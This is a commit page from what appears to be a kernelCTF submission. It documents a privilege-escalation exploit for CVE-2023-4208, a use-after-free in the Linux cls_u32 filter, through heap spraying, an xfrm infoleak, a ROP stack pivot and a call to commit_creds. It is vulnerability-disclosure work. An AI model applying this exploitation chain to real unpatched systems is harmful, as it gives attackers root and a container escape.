Skip to content

Commit c31b163

Browse files
kernelCTF: Add CVE-2023-4208_lts_cos_mitigation_2
1 parent aab489f commit c31b163

File tree

18 files changed

+3017
-0
lines changed

18 files changed

+3017
-0
lines changed
Original file line numberDiff line numberDiff line change
@@ -0,0 +1,173 @@
1+
## Setup
2+
3+
First, we create a root qdisc of the DRR type.
4+
Any classful qdisc can be used, but this choice affects the sizes of the objects involved in the exploitation.
5+
6+
Next, we create two child classes: 0x10001 and 0x10002.
7+
8+
We also add two u32 filters attached to the root qdisc:
9+
- handle 0x80000001, bound to the 0x10001 class, with selector value 0x1234 and mask 0xffff - this will prevent this filter from ever matching.
10+
- handle 0x80000002, bound to the 0x10001 class, with selector value 0 and mask 0 - this will cause this filter to match on any packet.
11+
12+
## Triggering use-after-free
13+
14+
To trigger the vulnerability [scenario 2](vulnerability.md#scenario-2) is used.
15+
16+
We change the bound class of the first filter (handle 0x80000001) to class 0x10002.
17+
This causes field filter_cnt of class 0x10001 to become 0, allowing us to delete it.
18+
19+
## Getting RIP control
20+
21+
Deleting a DRR class frees two objects:
22+
- struct drr_class, freed directly by kfree() in drr_destroy_class
23+
- struct qdisc scheduled to be freed through RCU in __qdisc_destroy()
24+
25+
26+
### LTS/COS exploit
27+
28+
The simplest way to get code execution is to target ->enqueue() function pointer of the qdisc struct:
29+
```
30+
struct qdisc {
31+
int (*enqueue)(struct sk_buff *, struct qdisc *, struct sk_buff * *); /* 0 0x8 */
32+
struct sk_buff * (*dequeue)(struct qdisc *); /* 0x8 0x8 */
33+
...
34+
```
35+
36+
->enqueue() is called from dev_qdisc_enqueue() after a packet is classified to a given class by u32_classify().
37+
38+
Struct qdisc is allocated from kmalloc-512, so we need a heap allocation primitive that will allocate from that cache and gives us control of the first 8 bytes of the object, which excludes some popular options like keys and xattrs.
39+
40+
In this exploit we used a netlink allocation primitive - if a message is sent on the netlink socket (other kinds can be used as well), kernel allocates a buffer for the data to be sent in __alloc_skb() using a kmalloc_reserve() wrapper which for the sizes we are interested in uses a regular general-use kmalloc cache.
41+
User data is copied at the very beginning of this buffer, with skb metadata (skb_shared_info) added at the end.
42+
43+
One last thing to remember is that we have to sleep for a bit to give RCU time to perform the callback that will free the qdisc object.
44+
45+
After contents of the qdisc object are under our control we just have to send any packet to get RIP control.
46+
47+
In this exploit we rely on the external KASLR leak, so the kernel text address is known beforehand.
48+
49+
50+
### Mitigation exploit
51+
52+
When I was writing the original mitigation exploit, I incorrectly assumed that targeting the qdisc object wouldn't work on the mitigation instance because of the static/dynamic kmalloc cache split.
53+
Looking back at this now, I see that the original exploit for LTS would work perfectly fine on mitigation (after adjusting offsets etc) because qdisc is allocated from dynamic cache due to its size being calculated at runtime in qdisc_alloc().
54+
55+
I'll document this unnecessarily complicated approach here anyways in case someone finds it interesting.
56+
57+
The mitigation exploit targets the other object freed when the class is deleted - struct drr_class.
58+
This object has a qdisc pointer at offset 0x60. If we managed to overwrite it with a pointer to a fake qdisc object, we could gain code execution in a similar way to the LTS exploit.
59+
60+
There are two issues to overcome with this approach:
61+
- drr_class is a fixed-size allocation, so with CONFIG_KMALLOC_SPLIT_VARSIZE enabled we have to find an object allocated from kmalloc-128 that has fixed size and has user-controlled data at offset 0x60
62+
- We have to have a place with a known address to store the fake qdisc object
63+
64+
First issue is solved by the struct clusterip_config which has a following field at the end:
65+
```
66+
struct clusterip_config {
67+
...
68+
char ifname[16]; /* 0x60 0x10 */
69+
70+
}
71+
72+
```
73+
74+
This object is allocated when creating an iptables rule with the CLUSTERIP target.
75+
The network interface provided in the ifname field has to exist, but this not a problem because we can rename the loopback interface to any name we want.
76+
The only restriction is that we can't use null or whitespace bytes.
77+
78+
The issue with placing the payload at a known address was solved by exploiting a separate infoleak vulnerability in the xfrm subsystem:
79+
80+
```
81+
author Herbert Xu <[email protected]> 2023-02-09 09:09:52 +0800
82+
committer Steffen Klassert <[email protected]> 2023-02-13 13:38:58 +0100
83+
commit 8222d5910dae08213b6d9d4bc9a7f8502855e624
84+
85+
xfrm: Zero padding when dumping algos and encap
86+
```
87+
88+
https://git.kernel.org/pub/scm/linux/kernel/git/torvalds/linux.git/commit/?id=8222d5910dae08213b6d9d4bc9a7f8502855e624
89+
90+
This vulnerability allows us to leak 64 bytes of uninitialized data from the xfrm_algo object allocated from the kmalloc-96 cache.
91+
We'll use it to leak data of a simple_xattr object, which looks like this:
92+
```
93+
struct simple_xattr {
94+
struct list_head list; /* 0 0x10 */
95+
char * name; /* 0x10 0x8 */
96+
size_t size; /* 0x18 0x8 */
97+
char value[]; /* 0x20 0 */
98+
99+
};
100+
```
101+
102+
Here's a procedure to get our data at a known address:
103+
104+
1. Create xattr x1 with data length of 96, but name length of 256 bytes so that simple_xattr is allocated from kmalloc-96, but name from kmalloc-256.
105+
2. Remove x1 and allocate xfrm_algo in place of its simple_xattr.
106+
3. Read x1->name pointer using infoleak.
107+
4. Create a new xattr x2 with data length placing it into kmalloc-256. This will be allocated in place of the x1's name buffer that was freed when x1 was removed. We now have controlled data at the address we leaked + 0x20 (simple_xattr header takes 0x20 bytes).
108+
109+
Next step is to rename the loopback interface to the name matching pointer to our fake qdisc object stored in x2.
110+
After this is done, we trigger the use-after-free in the same way as with LTS exploit and create an iptables CLUSTERIP rule with input interface set to the fake qdisc's address.
111+
This overwrites struct drr_class with struct clusterip_config, setting qdisc pointer of the former to the address of our fake object.
112+
113+
Finally, we send a network packet to be matched by u32_classify() leading to the ->enqueue function pointer of our fake qdisc being called.
114+
115+
## Pivot to ROP
116+
117+
When ->enqueue() is called registers are as follows:
118+
- RDI - pointer to the skb
119+
- RSI - pointer to the qdisc
120+
- RAX - copy of the RSI
121+
122+
RDI is not that useful to us, but RSI and RAX point directly to the data under our control..
123+
124+
Stack pivot has three stages using different gadgets.
125+
126+
#### Gadget 1
127+
128+
```
129+
lea rdi, [rax + 0x20]
130+
mov rax, qword ptr [rax + 0x30]
131+
jmp __x86_indirect_thunk_rax
132+
```
133+
134+
This adds 0x20 to our controlled data pointer, stores it into RDI and jumps to the next gadget.
135+
Adding 0x20 is very helpful, because we can't use the very beginning of the buffer as the start of the ROP - it contains the address of our first gadget.
136+
137+
#### Gadget 2
138+
139+
```
140+
push rdi
141+
jmp qword [rsi+0x0F]
142+
```
143+
144+
This pushes location of our ROP chain to the stack and jumps to the next gadget.
145+
146+
#### Gadget 3
147+
148+
```
149+
pop rsp
150+
ret
151+
```
152+
153+
Finally, we pop the previously pushed ROP location into RSP, completing the pivot
154+
155+
Gadgets above are from the LTS exploit, COS/mitigation versions work exactly the same, differences are only in registers used and offsets.
156+
157+
## Second pivot
158+
159+
At this point we have full ROP, but there is not much space - most of our buffer is taken by skb_shared_info struct at the end.
160+
To have enough space to execute all privilege escalation code we have to pivot again.
161+
This is quite simple - we choose an unused read/write area in the kernel and use copy_user_generic_string() to copy the second stage ROP from userspace to that area.
162+
Then we use `pop rsp ; ret` gadget to pivot there.
163+
164+
## Privilege escalation
165+
166+
To escalate our process's privileges we execute following functions from ROP chain:
167+
168+
- commit_creds(init_cred)
169+
- switch_task_namespaces(find_task_by_vpid(1), init_nsproxy)
170+
171+
Then we set up registers for return to the userspace and jump to the `swapgs ; sysret` gadget in return_via_sysret.
172+
173+
After getting back to userspace we call setns() on namespaces of pid 1 to complete escape to the initial namespace.
Original file line numberDiff line numberDiff line change
@@ -0,0 +1,134 @@
1+
## Requirements to trigger the vulnerability
2+
3+
- CAP_NET_ADMIN in a namespace is required
4+
- Kernel configuration: CONFIG_NET_CLS_U32
5+
- User namespaces required: Yes
6+
7+
## Commit which introduced the vulnerability
8+
9+
https://git.kernel.org/pub/scm/linux/kernel/git/torvalds/linux.git/commit/?id=de5df63228fcfbd5bb7fd883774c18fec9e61f12
10+
11+
## Commit which fixed the vulnerability
12+
13+
https://git.kernel.org/pub/scm/linux/kernel/git/torvalds/linux.git/commit/?id=3044b16e7c6fe5d24b1cdbcf1bd0a9d92d1ebd81
14+
15+
## Affected kernel versions
16+
17+
Introduced in 3.18. Fixed in 6.5, 6.1.44, 5.15.125 and other stable trees.
18+
19+
## Affected component, subsystem
20+
21+
net/sched: cls_u32
22+
23+
## Description
24+
25+
When u32_change() is called on an existing filter, the new object is allocated using u32_init_knode() and then u32_set_parms() is called on it:
26+
```
27+
...
28+
new = u32_init_knode(net, tp, n);
29+
if (!new)
30+
return -ENOMEM;
31+
32+
err = u32_set_parms(net, tp, base, new, tb,
33+
tca[TCA_RATE], flags, new->flags,
34+
extack);
35+
...
36+
```
37+
38+
u32_init_knode() copies data from the existing "n" filter, including the .res pointer:
39+
40+
```
41+
static struct tc_u_knode *u32_init_knode(struct net *net, struct tcf_proto *tp,
42+
struct tc_u_knode *n)
43+
{
44+
...
45+
new = kzalloc(struct_size(new, sel.keys, s->nkeys), GFP_KERNEL);
46+
if (!new)
47+
return NULL;
48+
49+
...
50+
[1] new->res = n->res;
51+
```
52+
53+
54+
The copied data includes a "res" field which is a tcf_result structure containing a pointer to the target class of a given filter.
55+
56+
u32_set_parms() calls tcf_bind_filter() if TCA_U32_CLASSID is set:
57+
```
58+
if (tb[TCA_U32_CLASSID]) {
59+
n->res.classid = nla_get_u32(tb[TCA_U32_CLASSID]);
60+
[2] tcf_bind_filter(tp, &n->res, base);
61+
}
62+
```
63+
64+
65+
66+
tcf_bind_filter() calls .bind_tcf handler on the target class, but if n->res.class was already set it also calls .unbind_tcf on it:
67+
68+
```
69+
static inline void
70+
__tcf_bind_filter(struct Qdisc *q, struct tcf_result *r, unsigned long base)
71+
{
72+
unsigned long cl;
73+
74+
cl = q->ops->cl_ops->bind_tcf(q, base, r->classid);
75+
cl = __cls_set_class(&r->class, cl);
76+
if (cl)
77+
[3] q->ops->cl_ops->unbind_tcf(q, cl);
78+
}
79+
```
80+
81+
82+
.bind_tcf/.unbind_tcf for most classful qdiscs just increase/decrease filter_cnt counter, which serves as a protection against class being destroyed, e.g.:
83+
```
84+
static void drr_unbind_tcf(struct Qdisc *sch, unsigned long arg)
85+
{
86+
struct drr_class *cl = (struct drr_class *)arg;
87+
88+
cl->filter_cnt--;
89+
}
90+
91+
static int drr_delete_class(struct Qdisc *sch, unsigned long arg,
92+
struct netlink_ext_ack *extack)
93+
{
94+
struct drr_sched *q = qdisc_priv(sch);
95+
struct drr_class *cl = (struct drr_class *)arg;
96+
97+
if (cl->filter_cnt > 0)
98+
return -EBUSY;
99+
...
100+
```
101+
102+
Finally, when the change of the existing filter is successful, tcf_unbind_filter() is called on the old filter in u32_change():
103+
```
104+
...
105+
u32_replace_knode(tp, tp_c, new);
106+
[4] tcf_unbind_filter(tp, &n->res);
107+
tcf_exts_get_net(&n->exts);
108+
tcf_queue_work(&n->rwork, u32_delete_key_work);
109+
return 0;
110+
...
111+
```
112+
113+
114+
115+
116+
This leads to a use-after-free (dangling res.class pointer) in two scenarios:
117+
118+
#### Scenario 1
119+
120+
u32_change() is called on the filter with an already bound target class "c1" and there is no TCA_U32_CLASSID in the new parameters.
121+
tcf_unbind_filter() is called on the old filter in [4].
122+
filter_cnt of the class "c1" is decreased and it is possible to delete it, however the to the class c1 was copied to fnew in [1] and is still set
123+
in the new version of the filter.
124+
125+
126+
#### Scenario 2
127+
128+
u32_change() is called on the filter with an already bound target class "c1", there is a TCA_U32_CLASSID in the new parameters, but it is set to the different class "c2"
129+
Class "c1" is also bound to another filter "f2", so its filter_cnt is 2 at the start.
130+
131+
tcf_bind_filter() is called in [2] leading to the unbind_tcf call [3] on the "c1" class. filter_cnt of "c1" is now 1.
132+
Finally, tcf_unbind_filter() is called in [4] leading to the second unbind_tcf on the "c1" class.
133+
This sets the filter_cnt of the "c1" to 0, allowing it to be destroyed, but it is still bound to the "f2" filter.
134+
Original file line numberDiff line numberDiff line change
@@ -0,0 +1,9 @@
1+
INCLUDES = -I/usr/include/libiptc -I/usr/include/libnl3
2+
LIBS = -L. -pthread -lip4tc -lnl-cli-3 -lnl-route-3 -lnl-3 -ldl
3+
CFLAGS = -fomit-frame-pointer -static
4+
5+
exploit: exploit.c libip4tc.a
6+
gcc -o $@ exploit.c $(INCLUDES) $(CFLAGS) $(LIBS)
7+
8+
prerequisites:
9+
sudo apt-get install libnl-cli-3-dev libnl-route-3-dev libip4tc-dev

0 commit comments

Comments
 (0)